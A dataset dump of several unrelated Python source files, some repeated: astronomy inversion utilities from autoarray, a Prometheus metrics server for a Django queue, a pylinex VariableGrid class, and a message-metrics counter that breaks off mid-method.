dict_langs, list_useful_lang = get_words_with_all_langs(synset_name)
print(dict_langs)
# current
for lang in list_useful_lang:
if lang in dict_lang_all:
for ww in dict_langs[lang]:
dict_lang_all[lang].append(ww)
else:
dict_lang_all[lang] = []
for ww in dict_langs[lang]:
dict_lang_all[lang].append(ww)
# hyponyms
if use_hyponym:
dict_lang_hyponyms=get_hyponyms(synset_name)
for lang in dict_lang_hyponyms:
if lang in dict_lang_all:
for ww in dict_lang_hyponyms[lang]:
dict_lang_all[lang].append(ww)
else:
dict_lang_all[lang] = []
for ww in dict_lang_hyponyms[lang]:
dict_lang_all[lang].append(ww)
# hypernyms
if use_hypernym:
dict_lang_hypernyms = get_hypernyms(synset_name)
for lang in dict_lang_hypernyms:
if lang in dict_lang_all:
for ww in dict_lang_hypernyms[lang]:
dict_lang_all[lang].append(ww)
else:
dict_lang_all[lang] = []
for ww in dict_lang_hypernyms[lang]:
dict_lang_all[lang].append(ww)
# print()
return dict_lang_all | 0.084429 | 0.054024 |
from autoarray import decorator_util
import numpy as np
from astropy.io import fits
import os
@decorator_util.jit()
def data_vector_from_blurred_mapping_matrix_and_data(
blurred_mapping_matrix, image, noise_map
):
"""Compute the hyper_galaxies vector *D* from a blurred util matrix *f* and the 1D image *d* and 1D noise-map *\sigma* \
(see Warren & Dye 2003).
Parameters
-----------
blurred_mapping_matrix : ndarray
The matrix representing the blurred mappings between sub-grid pixels and pixelization pixels.
image : ndarray
Flattened 1D array of the observed image the inversion is fitting.
noise_map : ndarray
Flattened 1D array of the noise-map used by the inversion during the fit.
"""
mapping_shape = blurred_mapping_matrix.shape
data_vector = np.zeros(mapping_shape[1])
for mask_1d_index in range(mapping_shape[0]):
for pix_1_index in range(mapping_shape[1]):
data_vector[pix_1_index] += (
image[mask_1d_index]
* blurred_mapping_matrix[mask_1d_index, pix_1_index]
/ (noise_map[mask_1d_index] ** 2.0)
)
return data_vector
def curvature_matrix_from_blurred_mapping_matrix(blurred_mapping_matrix, noise_map):
"""Compute the curvature matrix *F* from a blurred util matrix *f* and the 1D noise-map *\sigma* \
(see Warren & Dye 2003).
Parameters
-----------
blurred_mapping_matrix : ndarray
The matrix representing the blurred mappings between sub-grid pixels and pixelization pixels.
noise_map : ndarray
Flattened 1D array of the noise-map used by the inversion during the fit.
"""
flist = np.zeros(blurred_mapping_matrix.shape[1])
iflist = np.zeros(blurred_mapping_matrix.shape[1], dtype="int")
return curvature_matrix_from_blurred_mapping_matrix_jit(
blurred_mapping_matrix, noise_map, flist, iflist
)
@decorator_util.jit()
def curvature_matrix_from_blurred_mapping_matrix_jit(
blurred_mapping_matrix, noise_map, flist, iflist
):
"""Compute the curvature matrix *F* from a blurred util matrix *f* and the 1D noise-map *\sigma* \
(see Warren & Dye 2003).
Parameters
-----------
blurred_mapping_matrix : ndarray
The matrix representing the blurred mappings between sub-grid pixels and pixelization pixels.
noise_map : ndarray
Flattened 1D array of the noise-map used by the inversion during the fit.
flist : ndarray
NumPy array of floats used to store mappings for efficienctly calculation.
iflist : ndarray
NumPy array of integers used to store mappings for efficienctly calculation.
"""
curvature_matrix = np.zeros(
(blurred_mapping_matrix.shape[1], blurred_mapping_matrix.shape[1])
)
for mask_1d_index in range(blurred_mapping_matrix.shape[0]):
index = 0
for pix_1_index in range(blurred_mapping_matrix.shape[1]):
if blurred_mapping_matrix[mask_1d_index, pix_1_index] > 0.0:
flist[index] = (
blurred_mapping_matrix[mask_1d_index, pix_1_index]
/ noise_map[mask_1d_index]
)
iflist[index] = pix_1_index
index += 1
if index > 0:
for i1 in range(index):
for j1 in range(index):
ix = iflist[i1]
iy = iflist[j1]
curvature_matrix[ix, iy] += flist[i1] * flist[j1]
for i in range(blurred_mapping_matrix.shape[1]):
for j in range(blurred_mapping_matrix.shape[1]):
curvature_matrix[i, j] = curvature_matrix[j, i]
return curvature_matrix
@decorator_util.jit()
def mapped_reconstructed_data_from_mapping_matrix_and_reconstruction(
mapping_matrix, reconstruction
):
""" Compute the reconstructed hyper_galaxies vector from the blurrred util matrix *f* and solution vector *S*.
Parameters
-----------
mapping_matrix : ndarray
The matrix representing the blurred mappings between sub-grid pixels and pixelization pixels.
"""
mapped_reconstructred_data = np.zeros(mapping_matrix.shape[0])
for i in range(mapping_matrix.shape[0]):
for j in range(reconstruction.shape[0]):
mapped_reconstructred_data[i] += reconstruction[j] * mapping_matrix[i, j]
return mapped_reconstructred_data
@decorator_util.jit()
def data_vector_from_transformed_mapping_matrix_and_data(
transformed_mapping_matrix, visibilities, noise_map
):
"""Compute the hyper_galaxies vector *D* from a transformed util matrix *f* and the 1D image *d* and 1D noise-map *\sigma* \
(see Warren & Dye 2003).
Parameters
-----------
transformed_mapping_matrix : ndarray
The matrix representing the transformed mappings between sub-grid pixels and pixelization pixels.
image : ndarray
Flattened 1D array of the observed image the inversion is fitting.
noise_map : ndarray
Flattened 1D array of the noise-map used by the inversion during the fit.
"""
data_vector = np.zeros(transformed_mapping_matrix.shape[1])
for vis_1d_index in range(transformed_mapping_matrix.shape[0]):
for pix_1d_index in range(transformed_mapping_matrix.shape[1]):
data_vector[pix_1d_index] += (
visibilities[vis_1d_index]
* transformed_mapping_matrix[vis_1d_index, pix_1d_index]
/ (noise_map[vis_1d_index] ** 2.0)
)
return data_vector
def curvature_matrix_from_transformed_mapping_matrix(
transformed_mapping_matrix, noise_map
):
"""Compute the curvature matrix *F* from a transformed util matrix *f* and the 1D noise-map *\sigma* \
(see Warren & Dye 2003).
Parameters
-----------
transformed_mapping_matrix : ndarray
The matrix representing the transformed mappings between sub-grid pixels and pixelization pixels.
noise_map : ndarray
Flattened 1D array of the noise-map used by the inversion during the fit.
flist : ndarray
NumPy array of floats used to store mappings for efficienctly calculation.
iflist : ndarray
NumPy array of integers used to store mappings for efficienctly calculation.
"""
array = transformed_mapping_matrix / noise_map[:, None]
curvature_matrix = np.dot(array.T, np.matrix.transpose(array.T))
return curvature_matrix
def inversion_residual_map_from_pixelization_values_and_data(
pixelization_values,
data,
mask_1d_index_for_sub_mask_1d_index,
all_sub_mask_1d_indexes_for_pixelization_1d_index,
):
residual_map = np.zeros(
shape=len(all_sub_mask_1d_indexes_for_pixelization_1d_index)
)
for pix_1_index, sub_mask_1d_indexes in enumerate(
all_sub_mask_1d_indexes_for_pixelization_1d_index
):
sub_mask_total = 0
for sub_mask_1d_index in sub_mask_1d_indexes:
sub_mask_total += 1
mask_1d_index = mask_1d_index_for_sub_mask_1d_index[sub_mask_1d_index]
residual = data[mask_1d_index] - pixelization_values[pix_1_index]
residual_map[pix_1_index] += np.abs(residual)
if sub_mask_total > 0:
residual_map[pix_1_index] /= sub_mask_total
return residual_map.copy()
def inversion_normalized_residual_map_from_pixelization_values_and_reconstructed_data_1d(
pixelization_values,
data,
noise_map_1d,
mask_1d_index_for_sub_mask_1d_index,
all_sub_mask_1d_indexes_for_pixelization_1d_index,
):
normalized_residual_map = np.zeros(
shape=len(all_sub_mask_1d_indexes_for_pixelization_1d_index)
)
for pix_1_index, sub_mask_1d_indexes in enumerate(
all_sub_mask_1d_indexes_for_pixelization_1d_index
):
sub_mask_total = 0
for sub_mask_1d_index in sub_mask_1d_indexes:
sub_mask_total += 1
mask_1d_index = mask_1d_index_for_sub_mask_1d_index[sub_mask_1d_index]
residual = data[mask_1d_index] - pixelization_values[pix_1_index]
normalized_residual_map[pix_1_index] += np.abs(
(residual / noise_map_1d[mask_1d_index])
)
if sub_mask_total > 0:
normalized_residual_map[pix_1_index] /= sub_mask_total
return normalized_residual_map.copy()
def inversion_chi_squared_map_from_pixelization_values_and_reconstructed_data_1d(
pixelization_values,
data,
noise_map_1d,
mask_1d_index_for_sub_mask_1d_index,
all_sub_mask_1d_indexes_for_pixelization_1d_index,
):
chi_squared_map = np.zeros(
shape=len(all_sub_mask_1d_indexes_for_pixelization_1d_index)
)
for pix_1_index, sub_mask_1d_indexes in enumerate(
all_sub_mask_1d_indexes_for_pixelization_1d_index
):
sub_mask_total = 0
for sub_mask_1d_index in sub_mask_1d_indexes:
sub_mask_total += 1
mask_1d_index = mask_1d_index_for_sub_mask_1d_index[sub_mask_1d_index]
residual = data[mask_1d_index] - pixelization_values[pix_1_index]
chi_squared_map[pix_1_index] += (
residual / noise_map_1d[mask_1d_index]
) ** 2.0
if sub_mask_total > 0:
chi_squared_map[pix_1_index] /= sub_mask_total
return chi_squared_map.copy() | autoarray/util/inversion_util.py | from autoarray import decorator_util
import numpy as np
from astropy.io import fits
import os
@decorator_util.jit()
def data_vector_from_blurred_mapping_matrix_and_data(
blurred_mapping_matrix, image, noise_map
):
"""Compute the hyper_galaxies vector *D* from a blurred util matrix *f* and the 1D image *d* and 1D noise-map *\sigma* \
(see Warren & Dye 2003).
Parameters
-----------
blurred_mapping_matrix : ndarray
The matrix representing the blurred mappings between sub-grid pixels and pixelization pixels.
image : ndarray
Flattened 1D array of the observed image the inversion is fitting.
noise_map : ndarray
Flattened 1D array of the noise-map used by the inversion during the fit.
"""
mapping_shape = blurred_mapping_matrix.shape
data_vector = np.zeros(mapping_shape[1])
for mask_1d_index in range(mapping_shape[0]):
for pix_1_index in range(mapping_shape[1]):
data_vector[pix_1_index] += (
image[mask_1d_index]
* blurred_mapping_matrix[mask_1d_index, pix_1_index]
/ (noise_map[mask_1d_index] ** 2.0)
)
return data_vector
def curvature_matrix_from_blurred_mapping_matrix(blurred_mapping_matrix, noise_map):
"""Compute the curvature matrix *F* from a blurred util matrix *f* and the 1D noise-map *\sigma* \
(see Warren & Dye 2003).
Parameters
-----------
blurred_mapping_matrix : ndarray
The matrix representing the blurred mappings between sub-grid pixels and pixelization pixels.
noise_map : ndarray
Flattened 1D array of the noise-map used by the inversion during the fit.
"""
flist = np.zeros(blurred_mapping_matrix.shape[1])
iflist = np.zeros(blurred_mapping_matrix.shape[1], dtype="int")
return curvature_matrix_from_blurred_mapping_matrix_jit(
blurred_mapping_matrix, noise_map, flist, iflist
)
@decorator_util.jit()
def curvature_matrix_from_blurred_mapping_matrix_jit(
blurred_mapping_matrix, noise_map, flist, iflist
):
"""Compute the curvature matrix *F* from a blurred util matrix *f* and the 1D noise-map *\sigma* \
(see Warren & Dye 2003).
Parameters
-----------
blurred_mapping_matrix : ndarray
The matrix representing the blurred mappings between sub-grid pixels and pixelization pixels.
noise_map : ndarray
Flattened 1D array of the noise-map used by the inversion during the fit.
flist : ndarray
NumPy array of floats used to store mappings for efficienctly calculation.
iflist : ndarray
NumPy array of integers used to store mappings for efficienctly calculation.
"""
curvature_matrix = np.zeros(
(blurred_mapping_matrix.shape[1], blurred_mapping_matrix.shape[1])
)
for mask_1d_index in range(blurred_mapping_matrix.shape[0]):
index = 0
for pix_1_index in range(blurred_mapping_matrix.shape[1]):
if blurred_mapping_matrix[mask_1d_index, pix_1_index] > 0.0:
flist[index] = (
blurred_mapping_matrix[mask_1d_index, pix_1_index]
/ noise_map[mask_1d_index]
)
iflist[index] = pix_1_index
index += 1
if index > 0:
for i1 in range(index):
for j1 in range(index):
ix = iflist[i1]
iy = iflist[j1]
curvature_matrix[ix, iy] += flist[i1] * flist[j1]
for i in range(blurred_mapping_matrix.shape[1]):
for j in range(blurred_mapping_matrix.shape[1]):
curvature_matrix[i, j] = curvature_matrix[j, i]
return curvature_matrix
@decorator_util.jit()
def mapped_reconstructed_data_from_mapping_matrix_and_reconstruction(
mapping_matrix, reconstruction
):
""" Compute the reconstructed hyper_galaxies vector from the blurrred util matrix *f* and solution vector *S*.
Parameters
-----------
mapping_matrix : ndarray
The matrix representing the blurred mappings between sub-grid pixels and pixelization pixels.
"""
mapped_reconstructred_data = np.zeros(mapping_matrix.shape[0])
for i in range(mapping_matrix.shape[0]):
for j in range(reconstruction.shape[0]):
mapped_reconstructred_data[i] += reconstruction[j] * mapping_matrix[i, j]
return mapped_reconstructred_data
@decorator_util.jit()
def data_vector_from_transformed_mapping_matrix_and_data(
transformed_mapping_matrix, visibilities, noise_map
):
"""Compute the hyper_galaxies vector *D* from a transformed util matrix *f* and the 1D image *d* and 1D noise-map *\sigma* \
(see Warren & Dye 2003).
Parameters
-----------
transformed_mapping_matrix : ndarray
The matrix representing the transformed mappings between sub-grid pixels and pixelization pixels.
image : ndarray
Flattened 1D array of the observed image the inversion is fitting.
noise_map : ndarray
Flattened 1D array of the noise-map used by the inversion during the fit.
"""
data_vector = np.zeros(transformed_mapping_matrix.shape[1])
for vis_1d_index in range(transformed_mapping_matrix.shape[0]):
for pix_1d_index in range(transformed_mapping_matrix.shape[1]):
data_vector[pix_1d_index] += (
visibilities[vis_1d_index]
* transformed_mapping_matrix[vis_1d_index, pix_1d_index]
/ (noise_map[vis_1d_index] ** 2.0)
)
return data_vector
def curvature_matrix_from_transformed_mapping_matrix(
transformed_mapping_matrix, noise_map
):
"""Compute the curvature matrix *F* from a transformed util matrix *f* and the 1D noise-map *\sigma* \
(see Warren & Dye 2003).
Parameters
-----------
transformed_mapping_matrix : ndarray
The matrix representing the transformed mappings between sub-grid pixels and pixelization pixels.
noise_map : ndarray
Flattened 1D array of the noise-map used by the inversion during the fit.
flist : ndarray
NumPy array of floats used to store mappings for efficienctly calculation.
iflist : ndarray
NumPy array of integers used to store mappings for efficienctly calculation.
"""
array = transformed_mapping_matrix / noise_map[:, None]
curvature_matrix = np.dot(array.T, np.matrix.transpose(array.T))
return curvature_matrix
def inversion_residual_map_from_pixelization_values_and_data(
pixelization_values,
data,
mask_1d_index_for_sub_mask_1d_index,
all_sub_mask_1d_indexes_for_pixelization_1d_index,
):
residual_map = np.zeros(
shape=len(all_sub_mask_1d_indexes_for_pixelization_1d_index)
)
for pix_1_index, sub_mask_1d_indexes in enumerate(
all_sub_mask_1d_indexes_for_pixelization_1d_index
):
sub_mask_total = 0
for sub_mask_1d_index in sub_mask_1d_indexes:
sub_mask_total += 1
mask_1d_index = mask_1d_index_for_sub_mask_1d_index[sub_mask_1d_index]
residual = data[mask_1d_index] - pixelization_values[pix_1_index]
residual_map[pix_1_index] += np.abs(residual)
if sub_mask_total > 0:
residual_map[pix_1_index] /= sub_mask_total
return residual_map.copy()
def inversion_normalized_residual_map_from_pixelization_values_and_reconstructed_data_1d(
pixelization_values,
data,
noise_map_1d,
mask_1d_index_for_sub_mask_1d_index,
all_sub_mask_1d_indexes_for_pixelization_1d_index,
):
normalized_residual_map = np.zeros(
shape=len(all_sub_mask_1d_indexes_for_pixelization_1d_index)
)
for pix_1_index, sub_mask_1d_indexes in enumerate(
all_sub_mask_1d_indexes_for_pixelization_1d_index
):
sub_mask_total = 0
for sub_mask_1d_index in sub_mask_1d_indexes:
sub_mask_total += 1
mask_1d_index = mask_1d_index_for_sub_mask_1d_index[sub_mask_1d_index]
residual = data[mask_1d_index] - pixelization_values[pix_1_index]
normalized_residual_map[pix_1_index] += np.abs(
(residual / noise_map_1d[mask_1d_index])
)
if sub_mask_total > 0:
normalized_residual_map[pix_1_index] /= sub_mask_total
return normalized_residual_map.copy()
def inversion_chi_squared_map_from_pixelization_values_and_reconstructed_data_1d(
pixelization_values,
data,
noise_map_1d,
mask_1d_index_for_sub_mask_1d_index,
all_sub_mask_1d_indexes_for_pixelization_1d_index,
):
chi_squared_map = np.zeros(
shape=len(all_sub_mask_1d_indexes_for_pixelization_1d_index)
)
for pix_1_index, sub_mask_1d_indexes in enumerate(
all_sub_mask_1d_indexes_for_pixelization_1d_index
):
sub_mask_total = 0
for sub_mask_1d_index in sub_mask_1d_indexes:
sub_mask_total += 1
mask_1d_index = mask_1d_index_for_sub_mask_1d_index[sub_mask_1d_index]
residual = data[mask_1d_index] - pixelization_values[pix_1_index]
chi_squared_map[pix_1_index] += (
residual / noise_map_1d[mask_1d_index]
) ** 2.0
if sub_mask_total > 0:
chi_squared_map[pix_1_index] /= sub_mask_total
return chi_squared_map.copy() | 0.921935 | 0.857112 |
import json
import threading
from socket import gethostname
from typing import Any, Dict, List, Tuple, Sequence
from http.server import HTTPServer
from prometheus_client.exposition import MetricsHandler
from . import app_settings
from .types import QueueName, WorkerNumber
def get_config_response(
worker_queue_and_counts: Sequence[Tuple[QueueName, WorkerNumber]],
) -> List[Dict[str, Any]]:
"""
This is designed to be used by Prometheus, to direct it to scrape the
correct ports and assign the correct labels to pull in data from all the
running queue workers.
"""
return [
{
"targets": [
"{}:{}".format(
gethostname(),
app_settings.PROMETHEUS_START_PORT + index,
),
],
"labels": {
"django_lightweight_queue_worker_queue": queue,
"django_lightweight_queue_worker_num": str(worker_num),
},
}
for index, (queue, worker_num) in enumerate(worker_queue_and_counts, start=1)
]
def metrics_http_server(
worker_queue_and_counts: Sequence[Tuple[QueueName, WorkerNumber]],
) -> threading.Thread:
config_response = json.dumps(
get_config_response(worker_queue_and_counts),
sort_keys=True,
indent=4,
).encode('utf-8')
class RequestHandler(MetricsHandler, object):
def do_GET(self):
if self.path == "/worker_config":
self.send_response(200)
self.end_headers()
return self.wfile.write(config_response)
return super(RequestHandler, self).do_GET()
class MetricsServer(threading.Thread):
def __init__(self, *args, **kwargs):
super(MetricsServer, self).__init__(*args, **kwargs)
def run(self):
httpd = HTTPServer(('0.0.0.0', app_settings.PROMETHEUS_START_PORT), RequestHandler)
httpd.timeout = 2
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
return MetricsServer(name="Master Prometheus metrics server", daemon=True) | django_lightweight_queue/exposition.py | import json
import threading
from socket import gethostname
from typing import Any, Dict, List, Tuple, Sequence
from http.server import HTTPServer
from prometheus_client.exposition import MetricsHandler
from . import app_settings
from .types import QueueName, WorkerNumber
def get_config_response(
worker_queue_and_counts: Sequence[Tuple[QueueName, WorkerNumber]],
) -> List[Dict[str, Any]]:
"""
This is designed to be used by Prometheus, to direct it to scrape the
correct ports and assign the correct labels to pull in data from all the
running queue workers.
"""
return [
{
"targets": [
"{}:{}".format(
gethostname(),
app_settings.PROMETHEUS_START_PORT + index,
),
],
"labels": {
"django_lightweight_queue_worker_queue": queue,
"django_lightweight_queue_worker_num": str(worker_num),
},
}
for index, (queue, worker_num) in enumerate(worker_queue_and_counts, start=1)
]
def metrics_http_server(
worker_queue_and_counts: Sequence[Tuple[QueueName, WorkerNumber]],
) -> threading.Thread:
config_response = json.dumps(
get_config_response(worker_queue_and_counts),
sort_keys=True,
indent=4,
).encode('utf-8')
class RequestHandler(MetricsHandler, object):
def do_GET(self):
if self.path == "/worker_config":
self.send_response(200)
self.end_headers()
return self.wfile.write(config_response)
return super(RequestHandler, self).do_GET()
class MetricsServer(threading.Thread):
def __init__(self, *args, **kwargs):
super(MetricsServer, self).__init__(*args, **kwargs)
def run(self):
httpd = HTTPServer(('0.0.0.0', app_settings.PROMETHEUS_START_PORT), RequestHandler)
httpd.timeout = 2
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
return MetricsServer(name="Master Prometheus metrics server", daemon=True) | 0.66454 | 0.143998 |
import numpy as np
from distpy import sequence_types
try:
# this runs with no issues in python 2 but raises error in python 3
basestring
except:
# this try/except allows for python 2/3 compatible string type checking
basestring = str
class VariableGrid(object):
"""
Class representing an object which can store dimensions of a grid of
arbitrary dimension, D1, embedded in a space of arbitrary dimension, D2
(where D2>=D1). Each individual dimension of the smaller grid can traverse
any finite path through the larger space. Each individual dimension of the
larger space has a name and all of them must have values in each point of
the grid on the smaller space.
"""
@property
def names(self):
"""
Property storing the string names of each basis.
"""
if not hasattr(self, '_names'):
raise AttributeError("names was referenced before it was set.")
return self._names
@names.setter
def names(self, value):
"""
Allows user to set names property.
value: must be sequence of strings
"""
if type(value) in sequence_types:
if all([isinstance(element, basestring) for element in value]):
self._names = value
else:
raise TypeError("Not every element of names was a string.")
else:
raise TypeError("names was set to a non-sequence.")
@property
def dimensions(self):
"""
Property storing the dimensions of the grids to calculate. It takes the
form of a list of lists of dictionaries containing subsets.
"""
if not hasattr(self, '_dimensions'):
raise AttributeError("dimensions was referenced before it was " +\
"set somehow.")
return self._dimensions
@dimensions.setter
def dimensions(self, value):
"""
Setter for the dimensions property.
value: must be a list (whose length is the number of dimensions of the
desired grid) whose values are dictionaries (which have, as
keys, names of the dimensions of the larger space and have, as
values, numpy.ndarray objects giving dimension's range; note
that all ranges of each dictionary must be the same length)
"""
type_error = TypeError("dimensions should be a list of " +\
"dictionaries of arrays.")
if type(value) in sequence_types:
self._shape = []
self._dimensions_by_name = {name: None for name in self.names}
self._maxima = {name: -np.inf for name in self.names}
self._minima = {name: np.inf for name in self.names}
for (idimension, dimension) in enumerate(value):
if isinstance(dimension, dict):
variable_range_lengths = []
for name in dimension:
previous_idimension = self._dimensions_by_name[name]
if type(previous_idimension) is type(None):
self._dimensions_by_name[name] = idimension
else:
raise KeyError(("Variable, {0!s}, was given in " +\
"both dimension #{1} and dimension " +\
"#{2}.").format(name, previous_idimension,\
idimension))
variable_range = dimension[name]
if type(variable_range) in sequence_types:
variable_range = np.array(variable_range)
if variable_range.ndim != 1:
raise type_error
variable_range_lengths.append(len(variable_range))
variable_range_minimum = np.min(variable_range)
variable_range_maximum = np.max(variable_range)
if variable_range_minimum < self._minima[name]:
self._minima[name] = variable_range_minimum
if variable_range_maximum > self._maxima[name]:
self._maxima[name] = variable_range_maximum
else:
raise type_error
variable_range_lengths = np.array(variable_range_lengths)
if np.all(variable_range_lengths ==\
variable_range_lengths[0]):
self._shape.append(variable_range_lengths[0])
else:
raise ValueError("Not all arrays in a given " +\
"dimension dictionary were the " +\
"same length.")
else:
raise type_error
for name in self._dimensions_by_name:
if type(self._dimensions_by_name[name]) is type(None):
raise KeyError("The grid didn't use the variable, '" +\
name + "'.")
else:
raise type_error
self._shape = tuple(self._shape)
self._dimensions = value
@property
def dimensions_by_name(self):
"""
Property storing a dictionary whose keys are the names of variables and
whose values are the indices of the dimension where the name is varied.
"""
if not hasattr(self, '_dimensions_by_name'):
raise AttributeError("dimensions_by_name was referenced before " +\
"it was set. This shouldn't happen " +\
"because it should be set automatically " +\
"when dimensions is set.")
return self._dimensions_by_name
@property
def shape(self):
"""
Property storing the shape of the grids to calculate.
"""
if not hasattr(self, '_shape'):
raise AttributeError("shape was referenced before it was set. " +\
"This shouldn't happen because the shape " +\
"should be set automatically when " +\
"dimensions are set.")
return self._shape
@property
def ndim(self):
"""
Property storing the number of dimensions in this grid.
"""
if not hasattr(self, '_ndim'):
self._ndim = len(self.shape)
return self._ndim
def point_from_indices(self, indices):
"""
Retrieves a given point in the full space from the indices of the grid.
indices: sequence whose values are the indices of each grid dimension
returns: dictionary whose keys are the names of the variables and the
values are the indices (0<=indices[i]<shape[i] for all
0<=i<ndim) of the grid dimensions
"""
point = {}
for idimension, dimension in enumerate(self.dimensions):
index = indices[idimension]
for name in dimension:
point[name] = dimension[name][index]
return point
@property
def minima(self):
"""
Property storing the minimum of each dimension in a dictionary indexed
by variable name.
"""
if not hasattr(self, '_minima'):
raise AttributeError("minima was referenced before it was set. " +\
"This shouldn't happen because minima " +\
"should be set automatically when " +\
"dimensions are set.")
return self._maxima
@property
def maxima(self):
"""
Property storing the maximum of each dimension in a dictionary indexed
by variable name.
"""
if not hasattr(self, '_maxima'):
raise AttributeError("maxima was referenced before it was set. " +\
"This shouldn't happen because maxima " +\
"should be set automatically when " +\
"dimensions are set.")
return self._maxima | pylinex/util/VariableGrid.py | import numpy as np
from distpy import sequence_types
try:
# this runs with no issues in python 2 but raises error in python 3
basestring
except:
# this try/except allows for python 2/3 compatible string type checking
basestring = str
class VariableGrid(object):
"""
Class representing an object which can store dimensions of a grid of
arbitrary dimension, D1, embedded in a space of arbitrary dimension, D2
(where D2>=D1). Each individual dimension of the smaller grid can traverse
any finite path through the larger space. Each individual dimension of the
larger space has a name and all of them must have values in each point of
the grid on the smaller space.
"""
@property
def names(self):
"""
Property storing the string names of each basis.
"""
if not hasattr(self, '_names'):
raise AttributeError("names was referenced before it was set.")
return self._names
@names.setter
def names(self, value):
"""
Allows user to set names property.
value: must be sequence of strings
"""
if type(value) in sequence_types:
if all([isinstance(element, basestring) for element in value]):
self._names = value
else:
raise TypeError("Not every element of names was a string.")
else:
raise TypeError("names was set to a non-sequence.")
@property
def dimensions(self):
"""
Property storing the dimensions of the grids to calculate. It takes the
form of a list of lists of dictionaries containing subsets.
"""
if not hasattr(self, '_dimensions'):
raise AttributeError("dimensions was referenced before it was " +\
"set somehow.")
return self._dimensions
@dimensions.setter
def dimensions(self, value):
"""
Setter for the dimensions property.
value: must be a list (whose length is the number of dimensions of the
desired grid) whose values are dictionaries (which have, as
keys, names of the dimensions of the larger space and have, as
values, numpy.ndarray objects giving dimension's range; note
that all ranges of each dictionary must be the same length)
"""
type_error = TypeError("dimensions should be a list of " +\
"dictionaries of arrays.")
if type(value) in sequence_types:
self._shape = []
self._dimensions_by_name = {name: None for name in self.names}
self._maxima = {name: -np.inf for name in self.names}
self._minima = {name: np.inf for name in self.names}
for (idimension, dimension) in enumerate(value):
if isinstance(dimension, dict):
variable_range_lengths = []
for name in dimension:
previous_idimension = self._dimensions_by_name[name]
if type(previous_idimension) is type(None):
self._dimensions_by_name[name] = idimension
else:
raise KeyError(("Variable, {0!s}, was given in " +\
"both dimension #{1} and dimension " +\
"#{2}.").format(name, previous_idimension,\
idimension))
variable_range = dimension[name]
if type(variable_range) in sequence_types:
variable_range = np.array(variable_range)
if variable_range.ndim != 1:
raise type_error
variable_range_lengths.append(len(variable_range))
variable_range_minimum = np.min(variable_range)
variable_range_maximum = np.max(variable_range)
if variable_range_minimum < self._minima[name]:
self._minima[name] = variable_range_minimum
if variable_range_maximum > self._maxima[name]:
self._maxima[name] = variable_range_maximum
else:
raise type_error
variable_range_lengths = np.array(variable_range_lengths)
if np.all(variable_range_lengths ==\
variable_range_lengths[0]):
self._shape.append(variable_range_lengths[0])
else:
raise ValueError("Not all arrays in a given " +\
"dimension dictionary were the " +\
"same length.")
else:
raise type_error
for name in self._dimensions_by_name:
if type(self._dimensions_by_name[name]) is type(None):
raise KeyError("The grid didn't use the variable, '" +\
name + "'.")
else:
raise type_error
self._shape = tuple(self._shape)
self._dimensions = value
@property
def dimensions_by_name(self):
"""
Property storing a dictionary whose keys are the names of variables and
whose values are the indices of the dimension where the name is varied.
"""
if not hasattr(self, '_dimensions_by_name'):
raise AttributeError("dimensions_by_name was referenced before " +\
"it was set. This shouldn't happen " +\
"because it should be set automatically " +\
"when dimensions is set.")
return self._dimensions_by_name
@property
def shape(self):
"""
Property storing the shape of the grids to calculate.
"""
if not hasattr(self, '_shape'):
raise AttributeError("shape was referenced before it was set. " +\
"This shouldn't happen because the shape " +\
"should be set automatically when " +\
"dimensions are set.")
return self._shape
@property
def ndim(self):
"""
Property storing the number of dimensions in this grid.
"""
if not hasattr(self, '_ndim'):
self._ndim = len(self.shape)
return self._ndim
def point_from_indices(self, indices):
"""
Retrieves a given point in the full space from the indices of the grid.
indices: sequence whose values are the indices of each grid dimension
returns: dictionary whose keys are the names of the variables and the
values are the indices (0<=indices[i]<shape[i] for all
0<=i<ndim) of the grid dimensions
"""
point = {}
for idimension, dimension in enumerate(self.dimensions):
index = indices[idimension]
for name in dimension:
point[name] = dimension[name][index]
return point
@property
def minima(self):
"""
Property storing the minimum of each dimension in a dictionary indexed
by variable name.
"""
if not hasattr(self, '_minima'):
raise AttributeError("minima was referenced before it was set. " +\
"This shouldn't happen because minima " +\
"should be set automatically when " +\
"dimensions are set.")
return self._maxima
@property
def maxima(self):
"""
Property storing the maximum of each dimension in a dictionary indexed
by variable name.
"""
if not hasattr(self, '_maxima'):
raise AttributeError("maxima was referenced before it was set. " +\
"This shouldn't happen because maxima " +\
"should be set automatically when " +\
"dimensions are set.")
return self._maxima | 0.786787 | 0.607227 |
import threading
class MessageMetrics:
def __init__(self):
""" """
self.byte_sum = 0
self.message_count = 0
self.message_handle_time = 0
def increment_message_count(self, message_size, time_taken):
self.message_count += 1
self.byte_sum += message_size
self.message_handle_time += time_taken
def get_and_reset_metrics(self):
m_count = self.message_count
b_sum = self.byte_sum
t_taken = self.message_handle_time
self.message_count = 0
self.byte_sum = 0
self.message_handle_time = 0
return (m_count, b_sum, t_taken)
class MessageMetricsHandler:
def __init__(self, num_handlers, count_drops=False):
""" """
self.dropped_messages = 0
self.dropped_per_period = 0
self.dropped_lock = threading.Lock()
self.observed_messages = 0
self.observed_lock = threading.Lock()
self.metric_handlers = []
self.count_drops = count_drops
for i in range(num_handlers):
self.metric_handlers.append(MessageMetrics())
def handle_message(self, handler, message_size, time_taken):
if handler > len(self.metric_handlers) - 1 or handler < 0:
raise ValueError(f"Handler must be between 0 and {len(self.metric_handlers) - 1}")
self.metric_handlers[handler].increment_message_count(message_size, time_taken)
def publish_metrics(self):
""" """
# list of tuples (message_count, byte_sum, time_taken) for each worker
vals = [m.get_and_reset_metrics() for m in self.metric_handlers]
# summed tuple, [sum(message_count), sum(byte_sum), sum(time_taken)]
sums = [sum(x) for x in zip(*vals)]
handle_time = 0 if sums[0] == 0 else sums[2]/sums[0]
if self.count_drops:
message = f"m/s observed: {self.observed_messages}. m/s:{sums[0]}. d:{self.dropped_messages} d/s:{self.dropped_per_period} KB/s:{(sums[1] / 1024):.2f}. t/s:{handle_time:.2f}"
print(message.ljust(len(message)+20), end='')
print("\r", end='')
with self.dropped_lock:
self.dropped_per_period = 0
else:
message = f"m/s observed: {self.observed_messages}. m/s sent:{sums[0]}. KB/s:{(sums[1] / 1024):.2f}. t/m/s:{handle_time:.2f}"
print(message.ljust(len(message)+20), end='')
print("\r", end='')
# only lock once per publish period to ensure we reset observed
with self.observed_lock:
self.observed_messages = 0
def increment_dropped(self):
# shouldn't be calling this if we haven't enabled drop counters
if self.count_drops:
with self.dropped_lock:
self.dropped_messages += 1
self.dropped_per_period += 1
def increment_observed(self):
